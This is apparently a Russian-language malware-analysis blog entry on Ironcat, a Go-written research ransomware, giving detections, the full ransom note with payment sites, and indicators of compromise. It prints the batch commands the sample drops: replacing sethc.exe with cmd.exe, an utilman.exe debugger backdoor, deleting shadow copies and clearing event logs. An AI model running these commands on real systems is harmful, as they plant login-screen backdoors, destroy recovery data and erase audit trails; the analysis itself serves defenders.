Ironcat Ransomware
Этот крипто-вымогатель шифрует данные в процессе исследования вредоносных программ, а затем делает вид, что требует выкуп, чтобы вернуть файлы. Оригинальное название: Ironcat. На файле написано: iai-users.exe. Написан на языке Go.
✋ Создатель программы Аарон Розенмунд сообщил мне, что она была сделана для исследований и практических упражнений и никогда не распространялась с вредоносной целью.
Обнаружения:
DrWeb -> Trojan.Encoder.32634
BitDefender -> Generic.Ransom.Snatch.D0860D4B
ALYac -> Trojan.Ransom.Filecoder
Avira (no cloud) -> TR/Cobalt.nphvp
ESET-NOD32 -> A Variant Of Win64/Filecoder.CJ Kaspersky -> Trojan.Win32.Cobalt.aga
Malwarebytes -> Ransom.Sodinokibi.GO
Symantec -> Trojan.Gen.2
Tencent -> Win32.Trojan.Cobalt.Wtec
TrendMicro -> TROJ_FRS.VSNTIN20
---
To AV vendors! Want to be on this list regularly or be higher on the list? Contact me!
AV вендорам! Хотите быть в этом списке регулярно или повыше? Сообщите мне!
© Генеалогия: ??? >> Ironcat
Изображение — логотип статьи
К зашифрованным файлам добавляется расширение: .encrypted
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом.
Образец этого крипто-вымогателя был найден во второй половине сентября 2020 г. Ориентирован на англоязычных пользователей.
Записка с требованием выкупа называется: pay_the_piper.txt
Содержание записки о выкупе:
tazerface strikes again! Now with twice the ransom!
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ENCRYPTED
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/CA78BD67965B1577
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
windowsOgqhBdcaMCjDnoLhPEpFLBoNenFIHiOdPANOchCCrIdMsaamPqHdeBMFebOFCeDf_ _
!!!!DANGER!!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
Перевод записки на русский язык:
tazerface снова бьет! Теперь с вдвое большим выкупом!
--- === Добро пожаловать. Снова. === ---
[+] Что случилось? [+]
Ваши файлы зашифрованы и теперь недоступны. Вы можете это проверить: все файлы в вашей системе имеют расширение ENCRYPTED
Кстати, все можно восстановить (вернуть), но нужно следовать нашим инструкциям. Иначе вы не сможете вернуть свои данные (НИКОГДА).
[+] Какие гарантии? [+]
Это просто бизнес. Мы абсолютно не заботимся о вас и ваших сделках, кроме получения выгоды. Если мы не будем выполнять свою работу и обязательства - никто с нами не будет сотрудничать. Это не в наших интересах.
Чтобы проверить возможность возврата файлов, Вам следует зайти на наш сайт. Там можно бесплатно расшифровать один файл. Это наша гарантия.
Если вы не будете сотрудничать с нашим сервисом - для нас это не имеет значения. Но вы потеряете свое время и данные, потому что только у нас есть закрытый ключ. На практике время гораздо дороже денег.
[+] Как получить доступ на сайт? [+]
У вас есть два пути:
1) [Рекомендуется] Используйте браузер TOR!
а) Загрузите и установите браузер TOR с этого сайта: https://torproject.org/
б) Откройте наш сайт: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
2) Если TOR заблокирован в вашей стране, попробуйте использовать VPN! Но вы можете использовать наш вторичный сайт. Для этого:
а) Откройте любой браузер (Chrome, Firefox, Opera, IE, Edge)
б) Откройте наш дополнительный веб-сайт: http://decryptor.cc/CA78BD67965B1577
Предупреждение: вторичный сайт может быть заблокирован, поэтому первый вариант намного лучше и доступнее.
Когда вы открываете наш сайт, введите в форму ввода следующие данные:
Ключ:
windowsOgqhBdcaMCjDnoLhPEpFLBoNenFIHiOdPANOchCCrIdMsaamPqHdeBMFebOFCeDf_ _
!!!!ОПАСНОСТЬ!!!
НЕ ПЫТАЙТЕСЬ изменять файлы сами, НЕ используйте сторонние программы для восстановления ваших данных или антивирусные решения - это может повлечь за собой повреждение закрытого ключа и, как следствие, потерю всех данных.
!!! !!! !!!
ЕЩЕ ОДИН РАЗ. В ваших интересах вернуть свои файлы. Со своей стороны мы (лучшие специалисты) делаем все для восстановления, но не должны мешать.
!!! !!! !!!
Текст записки позаимствован из Sodinokibi Ransomware.
Оттуда же заимствованы адреса сайтов, указанных в записке о выкупе. Согласно информации, полученной от разных специалистов по крипто-вымогателям, Ironcat не имеет отношения к Sodinokibi.
Платить выкуп по ней НЕ нужно! 😸
Технические детали
Создатель программы Аарон Розенмунд сообщил мне, что она была сделана для исследований и практических упражнений. Но, если кто-то модифицирует и перенастроит программу, то она может начать распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.
Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1.
➤ После того, как все файлы зашифрованы, бинарник помещает четыре командных файла в каталог C:\Windows. У каждого своя функция.
Файл chtes.bat позволяет 5 раз нажать любую клавишу на экране входа в систему и запустить административную консоль cmd.exe:
“Chtes.bat” copy c:\Windows\System32\sethc.exe c:\Windows\System32\sethc.old && && del c:\Windows\System32\sethc.exe && copy c:\Windows\System32\cmd.exe c:\Windows\System32\sethc.exe
Файл netlogin.bat добавляет ключ reg для запуска административной консоли cmd.exe при каждом запуске utilman.exe, пропуская экраны входа и ограничения пользователя:
“Netlogin.bat” REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
Файл shadow.bat удаляет все теневые копии, которые можно было использовать для восстановления данных:
“Shadow.bat” cmd /C vssadmin delete shadows /all
Файл mssupdate.bat удаляет все журналы событий Windows.
“mssupdate.bat” FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")
➤ Если сопоставить задачи, то описанный функционал фактически использует дыру в безопасности Windows для запуска следующей команды:
copy C:\Windows\System32\sethc.exe c:\Windows\System32\chtes.old && del c:\Windows\System32\sethc.exe && copy c:\Windows\System32\cmd.exe c:\Windows\System32\sethc.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
Этот трюк позволяет выполнить любую команду с правами системы на экране входа в Windows до прохождения процедуры авторизации. При этом он подменяет исполняемый файл sethc.exe ("Sticky Keys") на свой файл.
➤ Код JavaScript компилирован в исполняемый файл.
Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.
Файлы, связанные с этим Ransomware:
pay_the_piper.txt - название исполняемого файла
iai-users.exe
iai-inetpub.exe
iai-sql.exe
iai-file.exe - название вредоносного файлаnetlogin.bat
shadow.bat
mssupdate.bat
Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->C:\Windows\netlogin.bat
C:\Windows\shadow.bat
C:\Windows\mssupdate.bat
C:\Windows\chtes.bat
Называет себя Ironcat.
Записи реестра, связанные с этим Ransomware:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
См. ниже результаты анализов.
Мьютексы:
См. ниже результаты анализов.
Сетевые подключения и связи:
URL: http://fakebook.com
URL: http://decryptor.cc/CA78BD67965B1577
Tor-URL: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA78BD67965B1577
Email: -
BTC: -
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.
Результаты анализов:
➤ Triage analysis >> Разработчик Ironcat-а, Aaron Rosenmund вышел на связь и сообщил, что его программа не предназначена для распространения и вредоносного использования. Он также открыл блог на своем сайте и в первом сообщении рассказал историю программы Ironcat и разместил мою картинку, которую я сделал логотипом этой статьи.
Из его рассказа стало известно, что Ironcat имеет защиту от вредоносных действий. Если запустить исполняемый файл без аргументов, он проверит это и сообщит вам, что вы не Ironcat: "I am ironcat, and you're not".
Это и есть защита от случайного запуска. Только с правильными аргументами он запуститься для шифрования файлов. Таким же образом, только с правильными аргументами работает дешифрование. При запуске с неправильными аргументами, Ironcat вместо обычного сообщения об ошибке напишет, что он любит чизбургеры.
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Read to links:
Tweet on Twitter + Tweet + Tweet + myTweet + Tweet
ID Ransomware (ID as Ironcat)
Write-up, Topic of Support
*
Thanks:
Joakim Kennedy, Michael Gillespie
Andrew Ivanov (author)
Aaron Rosenmund (Ironcat dev)
to the victims who sent the samples
© Amigo-A (Andrew Ivanov): All blog articles. Contact.
